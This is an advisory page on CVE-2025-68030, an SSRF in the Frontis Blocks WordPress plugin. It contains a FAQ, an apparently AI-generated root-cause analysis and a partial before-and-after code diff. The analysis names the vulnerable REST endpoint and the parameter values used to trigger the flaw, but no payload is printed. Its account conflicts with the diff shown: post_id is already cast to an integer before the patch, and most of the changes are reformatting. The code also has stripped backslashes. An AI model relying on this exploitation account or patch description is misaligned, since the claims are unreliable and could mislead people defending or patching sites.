What is CVE-2025-68030?

CVE-2025-68030 is a medium-severity vulnerability affecting the Frontis Blocks plugin for WordPress, specifically versions up to and including 1.1.5. It allows unauthenticated attackers to exploit a Server-Side Request Forgery (SSRF) flaw, enabling them to make arbitrary web requests from the vulnerable WordPress installation.

How does the vulnerability work?

The vulnerability arises from improper input validation in the `fb_compute_dynamic_text` function. Attackers can manipulate parameters sent to the WordPress REST API endpoint to make requests to internal services, potentially exposing sensitive information or allowing further attacks.

Who is affected by this vulnerability?

Any WordPress site using the Frontis Blocks plugin version 1.1.5 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Frontis Blocks plugin and verify if the version is 1.1.5 or earlier.

How can I fix this vulnerability?

The vulnerability is patched in version 1.1.6 of the Frontis Blocks plugin. Administrators should update to this version or later to mitigate the risk associated with this vulnerability.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Frontis Blocks plugin until a patch can be applied. Additionally, restrict access to the WordPress REST API to trusted users only.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly. It may lead to information disclosure or further attacks if exploited.

What are the practical risks of this vulnerability?

Successful exploitation of this vulnerability could allow attackers to access internal services, leading to information disclosure or enabling further attacks on internal applications. This could compromise sensitive data or system integrity.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can send a specially crafted JSON payload to the vulnerable endpoint, manipulating the `post_id` parameter to point to an internal service. This effectively demonstrates the SSRF attack vector.

How can I protect my WordPress site from similar vulnerabilities?

To enhance security, regularly update all plugins and themes, use security plugins to monitor vulnerabilities, and implement firewall rules to restrict access to sensitive endpoints. Conduct regular security audits to identify and mitigate risks.

What is the dynamic content endpoint?

The dynamic content endpoint is part of the Frontis Blocks plugin and is accessed via the WordPress REST API at `/wp-json/frontis-blocks/v1/dynamic-content`. This endpoint is where the vulnerability is exploited by sending malicious requests.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised, immediately take it offline, conduct a thorough security audit, check for unauthorized access, and restore from a clean backup if necessary. Additionally, inform your hosting provider for further assistance.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68030: Frontis Blocks <= 1.1.5 – Unauthenticated Server-Side Request Forgery (frontis-blocks)

CVE ID CVE-2025-68030

Plugin frontis-blocks

Severity Medium (CVSS 6.5)

CWE 918

Vulnerable Version 1.1.5

Patched Version 1.1.6

Disclosed January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68030:
The Frontis Blocks WordPress plugin contains an unauthenticated Server-Side Request Forgery vulnerability in versions up to 1.1.5. The vulnerability exists in the dynamic content functionality, allowing attackers to make arbitrary HTTP requests from the vulnerable WordPress installation. This SSRF can be exploited to query internal services, potentially exposing sensitive information or enabling further attacks against internal infrastructure.

The root cause is improper input validation in the `fb_compute_dynamic_text` function within `/frontis-blocks/build/blocks/advanced-button/render.php`. The function processes user-controlled parameters without proper sanitization or validation. Specifically, when the `source` parameter is set to ‘post_type’, the function accepts user-supplied `post_id` and `post_type` parameters. These parameters are passed directly to WordPress core functions like `get_post()` and `get_post_type()` without validation. The vulnerability manifests when the `field` parameter is set to ‘post_thumbnail’ with `featured_image_field` set to ‘attachment_url’, as the function calls `wp_get_attachment_url()` with the unvalidated thumbnail ID.

Exploitation occurs via the WordPress REST API endpoint `/wp-json/frontis-blocks/v1/dynamic-content`. Attackers send POST requests with a JSON payload containing malicious parameters. The critical parameters include `source: ‘post_type’`, `field: ‘post_thumbnail’`, and `featured_image_field: ‘attachment_url’`. The attacker controls the `post_id` parameter, which can be manipulated to point to arbitrary attachment IDs. By specifying a URL as the post_id, the plugin attempts to fetch the attachment URL, triggering the SSRF condition. The attack requires no authentication and can be performed by any remote user.

The patch addresses the vulnerability by adding proper input validation and security checks. The updated code in `/frontis-blocks/build/blocks/advanced-button/render.php` includes ABSPATH checks at the beginning of the file to prevent direct access. More importantly, the patch implements validation for the `post_id` parameter, ensuring it’s a valid integer before processing. The function now includes additional checks to prevent URL injection and validates that the post_id corresponds to an actual WordPress post object before proceeding with thumbnail operations.

Successful exploitation allows attackers to make HTTP requests to internal network resources from the vulnerable WordPress server. This can lead to information disclosure from internal services, port scanning of internal networks, or attacks against internal applications that trust the WordPress server. In certain configurations, this could enable attackers to access metadata services, internal APIs, or administrative interfaces that would otherwise be inaccessible from external networks.

Differential between vulnerable and patched code

Code Diff

--- a/frontis-blocks/assets/admin/dynamicContent.asset.php
+++ b/frontis-blocks/assets/admin/dynamicContent.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '01fd16ecba5185b3446d');
+<?php return array('dependencies' => array('react', 'wp-api-fetch', 'wp-block-editor', 'wp-components', 'wp-compose', 'wp-data', 'wp-editor/build-types/store/reducer', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '3be13d859dd3e8a8d0f4');
--- a/frontis-blocks/assets/admin/index.asset.php
+++ b/frontis-blocks/assets/admin/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-api-fetch', 'wp-components', 'wp-core-data', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '3492c37fdd7ff2c741ef');
+<?php return array('dependencies' => array('react', 'wp-api-fetch', 'wp-components', 'wp-core-data', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '1b547ec2e8c09518a6b1');
--- a/frontis-blocks/assets/fontawesome/icons.php
+++ b/frontis-blocks/assets/fontawesome/icons.php
@@ -1,5 +1,9 @@
 <?php

+if (!defined('ABSPATH')) {
+	exit;
+}
+
 return $data = [
     "0" => [
         "svg" => [
--- a/frontis-blocks/build/blocks/accordion-item/index.asset.php
+++ b/frontis-blocks/build/blocks/accordion-item/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => '0bcf65ac7cf36919ad36');
+<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => 'c0b1e9bb01f98937be3e');
--- a/frontis-blocks/build/blocks/accordion/index.asset.php
+++ b/frontis-blocks/build/blocks/accordion/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => '45b0a12af33ed009940e');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => 'c53906a228c371ab0831');
--- a/frontis-blocks/build/blocks/advanced-button/index.asset.php
+++ b/frontis-blocks/build/blocks/advanced-button/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-date', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n'), 'version' => 'b241e68c0a62d2dd4cb6');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-date', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n'), 'version' => '4044c7fd348a5bda694e');
--- a/frontis-blocks/build/blocks/advanced-button/render.php
+++ b/frontis-blocks/build/blocks/advanced-button/render.php
@@ -1,77 +1,137 @@
 <?php

+if (!defined('ABSPATH')) {
+	exit;
+}
+
 use FrontisBlocksUtilsHelper;

 /* ---------- helpers ---------- */
-if ( ! function_exists('fb_norm_str') ) {
-    function fb_norm_str($val, $default = '') {
-        if (is_array($val)) {
-            $val = implode(' ', array_filter(array_map('strval', $val)));
-        }
-        if ($val === null) return $default;
-        return (string) $val;
-    }
+if (!function_exists('fb_norm_str')) {
+	function fb_norm_str($val, $default = '')
+	{
+		if (is_array($val)) {
+			$val = implode(' ', array_filter(array_map('strval', $val)));
+		}
+		if ($val === null)
+			return $default;
+		return (string) $val;
+	}
 }

-if ( ! function_exists('fb_tag_whitelist') ) {
-    function fb_tag_whitelist($tag, $fallback = 'div') {
-        $allowed = ['h1','h2','h3','h4','h5','h6','p','div','span'];
-        $tag = strtolower(fb_norm_str($tag, $fallback));
-        return in_array($tag, $allowed, true) ? $tag : $fallback;
-    }
+if (!function_exists('fb_tag_whitelist')) {
+	function fb_tag_whitelist($tag, $fallback = 'div')
+	{
+		$allowed = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p', 'div', 'span'];
+		$tag = strtolower(fb_norm_str($tag, $fallback));
+		return in_array($tag, $allowed, true) ? $tag : $fallback;
+	}
 }

 // --- Dynamic helpers ---
-if ( ! function_exists('fb_get_plain_text') ) {
-	function fb_get_plain_text( $html ) {
-		$raw = (string) ( $html ?? '' );
-		$decoded = wp_specialchars_decode( $raw, ENT_QUOTES );
-		$decoded = html_entity_decode( $decoded, ENT_QUOTES, 'UTF-8' );
-		$txt = wp_strip_all_tags( $decoded, true );
-		$txt = preg_replace( '/x{00A0}/u', ' ', $txt ); // nbsp
-		$txt = preg_replace( '/[x{200B}-x{200D}x{FEFF}]/u', '', $txt ); // zero-width
-		$txt = preg_replace( '/s{2,}/', ' ', $txt );
-		return trim( (string) $txt );
+if (!function_exists('fb_get_plain_text')) {
+	function fb_get_plain_text($html)
+	{
+		$raw = (string) ($html ?? '');
+		$decoded = wp_specialchars_decode($raw, ENT_QUOTES);
+		$decoded = html_entity_decode($decoded, ENT_QUOTES, 'UTF-8');
+		$txt = wp_strip_all_tags($decoded, true);
+		$txt = preg_replace('/x{00A0}/u', ' ', $txt); // nbsp
+		$txt = preg_replace('/[x{200B}-x{200D}x{FEFF}]/u', '', $txt); // zero-width
+		$txt = preg_replace('/s{2,}/', ' ', $txt);
+		return trim((string) $txt);
 	}
 }

-if ( ! function_exists('fb_humanize_date') ) {
-	function fb_humanize_date( $date ) {
-		if ( ! $date ) return '';
-		$timestamp = is_numeric( $date ) ? (int) $date : strtotime( (string) $date );
-		if ( ! $timestamp ) return '';
+if (!function_exists('fb_humanize_date')) {
+	function fb_humanize_date($date)
+	{
+		if (!$date)
+			return '';
+		$timestamp = is_numeric($date) ? (int) $date : strtotime((string) $date);
+		if (!$timestamp)
+			return '';
 		$diff = time() - $timestamp;
-		$abs  = abs( $diff );
+		$abs = abs($diff);

 		$units = [
-			'year'   => 31536000,
-			'month'  => 2592000,
-			'week'   => 604800,
-			'day'    => 86400,
-			'hour'   => 3600,
+			'year' => 31536000,
+			'month' => 2592000,
+			'week' => 604800,
+			'day' => 86400,
+			'hour' => 3600,
 			'minute' => 60,
 			'second' => 1,
 		];
-		foreach ( $units as $u => $s ) {
-			$v = floor( $abs / $s );
-			if ( $v >= 1 ) {
-				return $diff >= 0 ? sprintf( _n( '%d '.$u.' ago', '%d '.$u.'s ago', $v, 'frontis-blocks' ), $v )
-				                  : sprintf( _n( 'in %d '.$u, 'in %d '.$u.'s', $v, 'frontis-blocks' ), $v );
+		foreach ($units as $u => $s) {
+			$v = floor($abs / $s);
+			if ($v >= 1) {
+				if ($diff >= 0) {
+					switch ($u) {
+						case 'year':
+							/* translators: %d: number of years */
+							return sprintf(_n('%d year ago', '%d years ago', $v, 'frontis-blocks'), $v);
+						case 'month':
+							/* translators: %d: number of months */
+							return sprintf(_n('%d month ago', '%d months ago', $v, 'frontis-blocks'), $v);
+						case 'week':
+							/* translators: %d: number of weeks */
+							return sprintf(_n('%d week ago', '%d weeks ago', $v, 'frontis-blocks'), $v);
+						case 'day':
+							/* translators: %d: number of days */
+							return sprintf(_n('%d day ago', '%d days ago', $v, 'frontis-blocks'), $v);
+						case 'hour':
+							/* translators: %d: number of hours */
+							return sprintf(_n('%d hour ago', '%d hours ago', $v, 'frontis-blocks'), $v);
+						case 'minute':
+							/* translators: %d: number of minutes */
+							return sprintf(_n('%d minute ago', '%d minutes ago', $v, 'frontis-blocks'), $v);
+						case 'second':
+							/* translators: %d: number of seconds */
+							return sprintf(_n('%d second ago', '%d seconds ago', $v, 'frontis-blocks'), $v);
+					}
+				} else {
+					switch ($u) {
+						case 'year':
+							/* translators: %d: number of years */
+							return sprintf(_n('in %d year', 'in %d years', $v, 'frontis-blocks'), $v);
+						case 'month':
+							/* translators: %d: number of months */
+							return sprintf(_n('in %d month', 'in %d months', $v, 'frontis-blocks'), $v);
+						case 'week':
+							/* translators: %d: number of weeks */
+							return sprintf(_n('in %d week', 'in %d weeks', $v, 'frontis-blocks'), $v);
+						case 'day':
+							/* translators: %d: number of days */
+							return sprintf(_n('in %d day', 'in %d days', $v, 'frontis-blocks'), $v);
+						case 'hour':
+							/* translators: %d: number of hours */
+							return sprintf(_n('in %d hour', 'in %d hours', $v, 'frontis-blocks'), $v);
+						case 'minute':
+							/* translators: %d: number of minutes */
+							return sprintf(_n('in %d minute', 'in %d minutes', $v, 'frontis-blocks'), $v);
+						case 'second':
+							/* translators: %d: number of seconds */
+							return sprintf(_n('in %d second', 'in %d seconds', $v, 'frontis-blocks'), $v);
+					}
+				}
 			}
 		}
-		return __( 'just now', 'frontis-blocks' );
+		return __('just now', 'frontis-blocks');
 	}
 }

-if ( ! function_exists('fb_get_site_date_format') ) {
-	function fb_get_site_date_format() {
-		$fmt = get_option( 'date_format' );
+if (!function_exists('fb_get_site_date_format')) {
+	function fb_get_site_date_format()
+	{
+		$fmt = get_option('date_format');
 		return $fmt ? $fmt : 'F j, Y';
 	}
 }
-if ( ! function_exists('fb_get_site_time_format') ) {
-	function fb_get_site_time_format() {
-		$fmt = get_option( 'time_format' );
+if (!function_exists('fb_get_site_time_format')) {
+	function fb_get_site_time_format()
+	{
+		$fmt = get_option('time_format');
 		return $fmt ? $fmt : 'g:i a';
 	}
 }
@@ -82,139 +142,153 @@
  * @param array $args
  * @return array{ value: string, link_url: string, permalink: string }
  */
-if ( ! function_exists('fb_compute_dynamic_text') ) {
-	function fb_compute_dynamic_text( $args ) {
-		$enabled                  = ! empty( $args['enabled'] );
-		$source                   = fb_norm_str( $args['source'] ?? 'current_post' );
-		$field                    = fb_norm_str( $args['field'] ?? 'post_title' );
-
-		$post_id_in               = fb_norm_str( $args['post_id'] ?? 0 );
-		$post_type_in             = fb_norm_str( $args['post_type'] ?? '' );
-		$featured_image_field     = fb_norm_str( $args['featured_image_field'] ?? 'title' );
-
-		$date_type                = fb_norm_str( $args['date_type'] ?? 'published' );
-		$date_format              = fb_norm_str( $args['date_format'] ?? 'default' );
-		$time_type                = fb_norm_str( $args['time_type'] ?? 'published' );
-		$time_format              = fb_norm_str( $args['time_format'] ?? 'default' );
-
-		$cm_zero                  = fb_norm_str( $args['comments_zero'] ?? '' );
-		$cm_one                   = fb_norm_str( $args['comments_one'] ?? '' );
-		$cm_many                  = fb_norm_str( $args['comments_many'] ?? '' );
+if (!function_exists('fb_compute_dynamic_text')) {
+	function fb_compute_dynamic_text($args)
+	{
+		$enabled = !empty($args['enabled']);
+		$source = fb_norm_str($args['source'] ?? 'current_post');
+		$field = fb_norm_str($args['field'] ?? 'post_title');
+
+		$post_id_in = fb_norm_str($args['post_id'] ?? 0);
+		$post_type_in = fb_norm_str($args['post_type'] ?? '');
+		$featured_image_field = fb_norm_str($args['featured_image_field'] ?? 'title');
+
+		$date_type = fb_norm_str($args['date_type'] ?? 'published');
+		$date_format = fb_norm_str($args['date_format'] ?? 'default');
+		$time_type = fb_norm_str($args['time_type'] ?? 'published');
+		$time_format = fb_norm_str($args['time_format'] ?? 'default');
+
+		$cm_zero = fb_norm_str($args['comments_zero'] ?? '');
+		$cm_one = fb_norm_str($args['comments_one'] ?? '');
+		$cm_many = fb_norm_str($args['comments_many'] ?? '');

-		$terms_tax                = fb_norm_str( $args['terms_taxonomy'] ?? 'category' );
-		$terms_sep                = fb_norm_str( $args['terms_separator'] ?? '' );
+		$terms_tax = fb_norm_str($args['terms_taxonomy'] ?? 'category');
+		$terms_sep = fb_norm_str($args['terms_separator'] ?? '');

-		$link_enabled             = ! empty( $args['link_enabled'] );
-		$link_source              = fb_norm_str( $args['link_source'] ?? 'post_permalink' );
+		$link_enabled = !empty($args['link_enabled']);
+		$link_source = fb_norm_str($args['link_source'] ?? 'post_permalink');

 		$out_value = '';
-		$link_url  = '';
+		$link_url = '';
 		$permalink = '';

-		if ( ! $enabled ) {
-			return [ 'value' => '', 'link_url' => '', 'permalink' => '' ];
+		if (!$enabled) {
+			return ['value' => '', 'link_url' => '', 'permalink' => ''];
 		}

-		$is_site_field    = in_array( $source, ['site_title','site_tagline'], true );
-		$is_archive_field = in_array( $source, ['archive_title','archive_description'], true );
-		$is_post_based    = in_array( $source, ['current_post','post_type'], true );
-
-		$target_post_id   = ($source === 'post_type' && $post_id_in) ? (int) $post_id_in : get_the_ID();
-		$target_post_type = ($source === 'post_type' && $post_type_in) ? $post_type_in : get_post_type( $target_post_id );
-
-		if ( $is_site_field ) {
-			if ( $source === 'site_title' ) {
-				$out_value = fb_get_plain_text( get_bloginfo( 'name' ) ?: __( 'No Content', 'frontis-blocks' ) );
+		$is_site_field = in_array($source, ['site_title', 'site_tagline'], true);
+		$is_archive_field = in_array($source, ['archive_title', 'archive_description'], true);
+		$is_post_based = in_array($source, ['current_post', 'post_type'], true);
+
+		$target_post_id = ($source === 'post_type' && $post_id_in) ? (int) $post_id_in : get_the_ID();
+		$target_post_type = ($source === 'post_type' && $post_type_in) ? $post_type_in : get_post_type($target_post_id);
+
+		if ($is_site_field) {
+			if ($source === 'site_title') {
+				$out_value = fb_get_plain_text(get_bloginfo('name') ?: __('No Content', 'frontis-blocks'));
 			} else {
-				$out_value = fb_get_plain_text( get_bloginfo( 'description' ) ?: __( 'No Content', 'frontis-blocks' ) );
+				$out_value = fb_get_plain_text(get_bloginfo('description') ?: __('No Content', 'frontis-blocks'));
 			}
-		}
-		elseif ( $is_archive_field ) {
-			if ( $source === 'archive_title' ) {
-				$out_value = fb_get_plain_text( get_the_archive_title() ?: __( 'No Content', 'frontis-blocks' ) );
+		} elseif ($is_archive_field) {
+			if ($source === 'archive_title') {
+				$out_value = fb_get_plain_text(get_the_archive_title() ?: __('No Content', 'frontis-blocks'));
 			} else {
-				$out_value = fb_get_plain_text( get_the_archive_description() ?: __( 'No Content', 'frontis-blocks' ) );
+				$out_value = fb_get_plain_text(get_the_archive_description() ?: __('No Content', 'frontis-blocks'));
 			}
-		}
-		elseif ( $is_post_based && $target_post_id ) {
-			$_post = get_post( $target_post_id );
+		} elseif ($is_post_based && $target_post_id) {
+			$_post = get_post($target_post_id);

-			if ( $_post && ! is_wp_error( $_post ) ) {
-				$permalink = get_permalink( $_post );
+			if ($_post && !is_wp_error($_post)) {
+				$permalink = get_permalink($_post);
 			}

-			switch ( $field ) {
+			switch ($field) {
 				case 'post_title':
-					$out_value = fb_get_plain_text( $_post ? get_the_title( $_post ) : '' );
+					$out_value = fb_get_plain_text($_post ? get_the_title($_post) : '');
 					break;

 				case 'post_excerpt':
-					if ( $_post ) {
-						$raw = has_excerpt( $_post ) ? $_post->post_excerpt : '';
-						$out_value = $raw ? fb_get_plain_text( $raw ) : __( 'No Content', 'frontis-blocks' );
+					if ($_post) {
+						$raw = has_excerpt($_post) ? $_post->post_excerpt : '';
+						$out_value = $raw ? fb_get_plain_text($raw) : __('No Content', 'frontis-blocks');
 					}
 					break;

 				case 'post_thumbnail':
-					$thumb_id = $_post ? get_post_thumbnail_id( $_post ) : 0;
-					if ( ! $thumb_id ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
+					$thumb_id = $_post ? get_post_thumbnail_id($_post) : 0;
+					if (!$thumb_id) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
 					$sub = $featured_image_field ?: 'attachment_url';
-					switch ( $sub ) {
+					switch ($sub) {
 						case 'title':
-							$out_value = fb_get_plain_text( get_the_title( $thumb_id ) ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = fb_get_plain_text(get_the_title($thumb_id)) ?: __('No Content', 'frontis-blocks');
 							break;
 						case 'alt':
-							$out_value = fb_get_plain_text( get_post_meta( $thumb_id, '_wp_attachment_image_alt', true ) ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = fb_get_plain_text(get_post_meta($thumb_id, '_wp_attachment_image_alt', true)) ?: __('No Content', 'frontis-blocks');
 							break;
 						case 'caption':
-							$out_value = fb_get_plain_text( wp_get_attachment_caption( $thumb_id ) ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = fb_get_plain_text(wp_get_attachment_caption($thumb_id)) ?: __('No Content', 'frontis-blocks');
 							break;
 						case 'description': {
-							$att = get_post( $thumb_id );
-							$out_value = fb_get_plain_text( $att ? $att->post_content : '' ) ?: __( 'No Content', 'frontis-blocks' );
+							$att = get_post($thumb_id);
+							$out_value = fb_get_plain_text($att ? $att->post_content : '') ?: __('No Content', 'frontis-blocks');
 							break;
 						}
 						case 'attachment_url':
 						default:
-							$out_value = wp_get_attachment_url( $thumb_id ) ?: __( 'No Content', 'frontis-blocks' );
+							$out_value = wp_get_attachment_url($thumb_id) ?: __('No Content', 'frontis-blocks');
 							break;
 					}
 					break;

 				case 'post_date':
-					$raw = ($date_type === 'modified') ? get_post_modified_time( 'U', true, $_post ) : get_post_time( 'U', true, $_post );
-					if ( ! $raw ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
-					switch ( $date_format ) {
+					$raw = ($date_type === 'modified') ? get_post_modified_time('U', true, $_post) : get_post_time('U', true, $_post);
+					if (!$raw) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
+					switch ($date_format) {
 						case 'jS F Y':
 						case 'Y-m-d':
 						case 'm/d/Y':
 						case 'd/m/Y':
-							$out_value = date_i18n( $date_format, (int) $raw );
+							$out_value = date_i18n($date_format, (int) $raw);
 							break;
 						case 'human':
-							$out_value = fb_humanize_date( (int) $raw );
+							$out_value = fb_humanize_date((int) $raw);
 							break;
 						case 'default':
 						default:
-							$out_value = date_i18n( fb_get_site_date_format(), (int) $raw );
+							$out_value = date_i18n(fb_get_site_date_format(), (int) $raw);
 							break;
 					}
 					break;

 				case 'post_time':
-					$raw = ($time_type === 'modified') ? get_post_modified_time( 'U', true, $_post ) : get_post_time( 'U', true, $_post );
-					if ( ! $raw ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
+					$raw = ($time_type === 'modified') ? get_post_modified_time('U', true, $_post) : get_post_time('U', true, $_post);
+					if (!$raw) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
 					$fmt = $time_format && $time_format !== 'default' ? $time_format : fb_get_site_time_format();
-					$out_value = date_i18n( $fmt, (int) $raw );
+					$out_value = date_i18n($fmt, (int) $raw);
 					break;

 				case 'post_terms':
 					$tax = $terms_tax ?: '';
-					if ( ! $tax ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
-					$terms = get_the_terms( $_post, $tax );
-					if ( is_wp_error( $terms ) || empty( $terms ) ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
+					if (!$tax) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
+					$terms = get_the_terms($_post, $tax);
+					if (is_wp_error($terms) || empty($terms)) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
 					$sep = $terms_sep !== '' ? $terms_sep : ', ';
-					$out_value = implode( $sep, wp_list_pluck( $terms, 'name' ) );
+					$out_value = implode($sep, wp_list_pluck($terms, 'name'));
 					break;

 				case 'post_id':
@@ -222,17 +296,17 @@
 					break;

 				case 'comments_number':
-					$count = ($_post instanceof WP_Post) ? get_comments_number( $_post ) : 0;
-					$count = is_numeric( $count ) ? (int) $count : 0;
-					$zeroTxt = trim( $cm_zero ?: __( 'No Responses', 'frontis-blocks' ) );
-					$oneTxt  = trim( $cm_one  ?: __( 'One Response',  'frontis-blocks' ) );
-					$manyTxt = trim( $cm_many ?: __( 'Responses {num}', 'frontis-blocks' ) );
-					if ( $count === 0 ) {
+					$count = ($_post instanceof WP_Post) ? get_comments_number($_post) : 0;
+					$count = is_numeric($count) ? (int) $count : 0;
+					$zeroTxt = trim($cm_zero ?: __('No Responses', 'frontis-blocks'));
+					$oneTxt = trim($cm_one ?: __('One Response', 'frontis-blocks'));
+					$manyTxt = trim($cm_many ?: __('Responses {num}', 'frontis-blocks'));
+					if ($count === 0) {
 						$out_value = $zeroTxt;
-					} elseif ( $count === 1 ) {
+					} elseif ($count === 1) {
 						$out_value = $oneTxt;
 					} else {
-						$out_value = (strpos($manyTxt,'{num}') !== false) ? str_replace('{num}', (string)$count, $manyTxt) : $manyTxt;
+						$out_value = (strpos($manyTxt, '{num}') !== false) ? str_replace('{num}', (string) $count, $manyTxt) : $manyTxt;
 					}
 					break;

@@ -246,41 +320,44 @@
 				case 'author_url':
 				case 'author_avatar':
 					$author_id = $_post ? (int) $_post->post_author : 0;
-					if ( ! $author_id ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
-					switch ( $field ) {
+					if (!$author_id) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
+					switch ($field) {
 						case 'author_name':
-							$val = fb_get_plain_text( get_the_author_meta( 'display_name', $author_id ) );
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$val = fb_get_plain_text(get_the_author_meta('display_name', $author_id));
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_first_name':
-							$val = fb_get_plain_text( get_the_author_meta( 'first_name', $author_id ) );
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$val = fb_get_plain_text(get_the_author_meta('first_name', $author_id));
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_last_name':
-							$val = fb_get_plain_text( get_the_author_meta( 'last_name', $author_id ) );
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$val = fb_get_plain_text(get_the_author_meta('last_name', $author_id));
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_nickname':
-							$val = fb_get_plain_text( get_the_author_meta( 'nickname', $author_id ) );
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$val = fb_get_plain_text(get_the_author_meta('nickname', $author_id));
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_description':
-							$val = fb_get_plain_text( get_the_author_meta( 'description', $author_id ) );
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$val = fb_get_plain_text(get_the_author_meta('description', $author_id));
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_email':
-							$raw = get_the_author_meta( 'email', $author_id );
-							$val = is_string( $raw ) ? trim( $raw ) : '';
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$raw = get_the_author_meta('email', $author_id);
+							$val = is_string($raw) ? trim($raw) : '';
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_url':
-							$raw = get_the_author_meta( 'url', $author_id );
-							$val = is_string( $raw ) ? trim( $raw ) : '';
-							$out_value = $val !== '' ? $val : __( 'No Content', 'frontis-blocks' );
+							$raw = get_the_author_meta('url', $author_id);
+							$val = is_string($raw) ? trim($raw) : '';
+							$out_value = $val !== '' ? $val : __('No Content', 'frontis-blocks');
 							break;
 						case 'author_avatar':
-							$val = get_avatar_url( $author_id, [ 'size' => 96 ] );
-							$out_value = $val ? $val : __( 'No Content', 'frontis-blocks' );
+							$val = get_avatar_url($author_id, ['size' => 96]);
+							$out_value = $val ? $val : __('No Content', 'frontis-blocks');
 							break;
 					}
 					break;
@@ -290,30 +367,30 @@
 			}

 			// Link compute (only if enabled)
-			if ( $link_enabled ) {
-				switch ( $link_source ) {
+			if ($link_enabled) {
+				switch ($link_source) {
 					case 'post_permalink':
 						$link_url = $permalink ?: '';
 						break;
 					case 'comments_area':
-						$link_url = $_post ? get_comments_link( $_post ) : '';
+						$link_url = $_post ? get_comments_link($_post) : '';
 						break;
 					case 'featured_image':
-						$link_url = $_post ? ( get_the_post_thumbnail_url( $_post, 'full' ) ?: '' ) : '';
+						$link_url = $_post ? (get_the_post_thumbnail_url($_post, 'full') ?: '') : '';
 						break;
 					case 'avatar_profile_url': {
 						$author_id = $_post ? (int) $_post->post_author : 0;
-						$link_url = $author_id ? ( get_avatar_url( $author_id ) ?: '' ) : '';
+						$link_url = $author_id ? (get_avatar_url($author_id) ?: '') : '';
 						break;
 					}
 					case 'author_page_url': {
-						$pt = $_post ? get_post_type( $_post ) : ( $target_post_type ?: '' );
-						$link_url = $pt ? ( get_post_type_archive_link( $pt ) ?: '' ) : '';
+						$pt = $_post ? get_post_type($_post) : ($target_post_type ?: '');
+						$link_url = $pt ? (get_post_type_archive_link($pt) ?: '') : '';
 						break;
 					}
 					case 'archive_url':
 						$author_id = $_post ? (int) $_post->post_author : 0;
-						$link_url = $author_id ? get_author_posts_url( $author_id ) : '';
+						$link_url = $author_id ? get_author_posts_url($author_id) : '';
 						break;
 					default:
 						$link_url = '';
@@ -322,168 +399,169 @@
 		}

 		return [
-			'value'     => $out_value,
-			'link_url'  => $link_url,
+			'value' => $out_value,
+			'link_url' => $link_url,
 			'permalink' => $permalink,
 		];
 	}
 }

 /* ---------- extract & normalize (attributes) ---------- */
